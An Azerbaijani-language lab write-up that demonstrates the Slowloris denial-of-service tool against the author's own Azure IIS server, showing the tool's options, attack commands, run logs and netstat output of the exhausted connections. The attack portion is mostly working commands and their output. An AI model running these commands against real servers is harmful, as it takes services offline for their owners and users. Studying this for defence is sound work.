alixansec
Slowloris :
Bu yazıda slowloris dos/ddos hücum alətindən qısaca danışacağıq, bu alətin necə istifadə edildiyini, nə iş gördüyünü və uğurlu bir alət olub olmadığını araşdıracağıq.
Slowloris daima 80-ci portda serverlə əlaqə açır. Time-out bağlantıları yerinə dərhal yeni bir əlaqə açmaqla, əlaqə sayı təxminən 30–45 saniyə ərzində 1000-ə çata bilər. Bu olduqca güclü hücumdur. Hücuma başladıqdan bir müddət sonra, maksimum əlaqə sayına çataraq artıq yeni əlaqə aça bilmədiyi üçün səhifə göstərilə bilməyəcək və xidmətin kəsilməsi qısa müddətə də olsa kəsiləcək.
MITRE ATT&CK ilə baxsaq: Impact TA0040
> Network Denial of Service T1498 , Endpoint Denial of Service T1499
QEYD ! LAB ortamı şəxsi olaraq mənə məxsusdur bu çalısmanı icazəsiz ortamlarda istifadə etmək qanunsuzdur.
alixansec@Kali:~/slowloris$ python3 slowloris.py -h
usage: slowloris.py [-h] [-p PORT] [-s SOCKETS] [-v] [-ua] [-x] [ — proxy-host PROXY_HOST] [ — proxy-port PROXY_PORT] [ — https] [ — sleeptime SLEEPTIME] [host]Slowloris, low bandwidth stress test tool for websitespositional arguments:
host Host to perform stress test onoptional arguments:
-h, — help show this help message and exit
-p PORT, — port PORT Port of webserver, usually 80
-s SOCKETS, — sockets SOCKETS
Number of sockets to use in the test
-v, — verbose Increases logging
-ua, — randuseragents
Randomizes user-agents with each request
-x, — useproxy Use a SOCKS5 proxy for connecting
— proxy-host PROXY_HOST
SOCKS5 proxy host
— proxy-port PROXY_PORT
SOCKS5 proxy port
— https Use HTTPS for the requests
— sleeptime SLEEPTIME
Time to sleep between each header sent
Hücum edək :)
Azurda Kali və Windows Server quraşdırdım Windows serverdə IIS quraşdırdım və public olaraq açdım.
PS C:\Users\alixansec> ipconfig
Windows IP Configuration
IPv4 Address. . . . . . . . . . . : 10.0.0.4
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.0.0.1
Public IP : 52.234.217.87
Kali IP Configuration
IPv4 Address. . . . . . . . . . . :10.0.0.5
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.0.0.1
PS C:\Users\alixansec> netstat -aon | findstr :80
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 10.0.0.4:49717 168.63.129.16:80 ESTABLISHED 3952
TCP 10.0.0.4:50241 168.63.129.16:80 ESTABLISHED 2056
TCP 10.0.0.4:50245 168.63.129.16:80 TIME_WAIT 0
TCP [::]:80 [::]:0 LISTENING 4alixansec@Kali:~/slowloris$ python3 slowloris.py 52.234.217.87
[31–01–2022 15:58:03] Attacking 52.234.217.87 with 150 sockets.
[31–01–2022 15:58:03] Creating sockets…
[31–01–2022 15:58:03] Sending keep-alive headers… Socket count: 150
[31–01–2022 15:58:18] Sending keep-alive headers… Socket count: 150
[31–01–2022 15:58:33] Sending keep-alive headers… Socket count: 150
[31–01–2022 15:58:36] Stopping Slowloris PS C:\Users\alixansec> netstat -aon | findstr :80
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 10.0.0.4:80 52.191.7.178:45420 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45424 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45428 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45430 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45432 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45434 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45436 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45438 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45440 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45442 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45444 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45446 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45448 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45450 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45452 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45454 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45456 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45458 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45460 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45462 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45464 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45466 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45468 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45470 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45472 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45474 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45476 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45478 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45480 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45482 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45484 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45486 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45488 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45490 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45492 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45494 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45496 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45498 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45500 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45502 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45504 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45506 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45508 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45510 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45512 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45514 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45516 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45518 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45520 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45522 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45524 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45526 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45528 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45530 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45532 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45534 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45536 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45538 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45540 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45542 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45544 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45546 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45548 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45550 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45552 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45554 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45556 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45558 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45560 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45562 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45564 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45566 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45568 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45570 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45572 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45574 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45576 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45578 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45580 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45582 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45584 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45586 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45588 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45590 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45592 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45594 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45596 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45598 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45600 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45602 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45604 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45606 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45608 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45610 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45612 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45614 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45616 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45618 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45620 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45622 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45624 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45626 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45628 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45630 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45632 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45634 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45636 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45638 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45640 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45642 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45644 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45646 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45648 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45650 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45652 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45654 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45656 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45658 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45660 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45662 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45664 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45666 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45668 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45670 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45672 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45674 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45676 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45678 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45680 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45682 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45684 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45686 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45688 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45690 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45692 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45694 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45696 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45698 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45700 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45702 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45704 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45706 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45708 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45710 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45712 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45714 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45716 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45718 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45720 ESTABLISHED 4
TCP 10.0.0.4:80 52.191.7.178:45722 ESTABLISHED 4
TCP 10.0.0.4:49717 168.63.129.16:80 ESTABLISHED 3952
TCP 10.0.0.4:50241 168.63.129.16:80 ESTABLISHED 2056
TCP 10.0.0.4:50245 168.63.129.16:80 TIME_WAIT 0
TCP [::]:80 [::]:0 LISTENING 4
PS C:\Users\alixansec>
alixansec@Kali:~/slowloris$ python3 slowloris.py 52.234.217.87 -s 999
[31–01–2022 16:01:05] Attacking 52.234.217.87 with 999 sockets.
[31–01–2022 16:01:05] Creating sockets…
[31–01–2022 16:01:06] Sending keep-alive headers… Socket count: 999
[31–01–2022 16:01:21] Sending keep-alive headers… Socket count: 999
[31–01–2022 16:01:36] Sending keep-alive headers… Socket count: 999
[31–01–2022 16:01:51] Sending keep-alive headers… Socket count: 999
[31–01–2022 16:02:06] Sending keep-alive headers… Socket count: 999
[31–01–2022 16:02:21] Sending keep-alive headers… Socket count: 999
[31–01–2022 16:02:36] Sending keep-alive headers… Socket count: 999
[31–01–2022 16:02:40] Stopping Slowloris
Bu paketin wireshark faylının yükləmə kecidi.
